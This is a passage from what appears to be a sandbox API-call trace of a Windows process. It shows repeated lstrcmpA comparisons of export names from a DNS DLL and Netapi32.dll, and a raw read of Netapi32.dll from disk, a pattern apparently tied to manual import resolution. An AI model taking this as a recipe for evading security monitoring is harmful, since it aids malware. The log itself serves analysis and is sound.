(lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0139.613] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0139.613] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0139.614] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.614] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.621] GetProcessHeap () returned 0x430000 [0139.621] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3a9d010 | out: hHeap=0x430000) returned 1 [0139.622] GetProcessHeap () returned 0x430000 [0139.622] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449320 [0139.623] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0139.625] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0139.625] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0139.625] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0139.625] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0139.626] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0139.626] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0139.626] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0139.626] GetProcessHeap () returned 0x430000 [0139.626] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13b00) returned 0x2d65030 [0139.626] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0139.626] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0139.626] CloseHandle (hObject=0x17c) returned 1 [0139.626] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0139.626] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0139.626] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0139.626] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0139.626] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.626] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.626] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0139.627] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0139.628] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0139.629] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0139.630] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0139.630] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0139.631] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0139.632] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0139.633] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0139.634] lstrcmpA 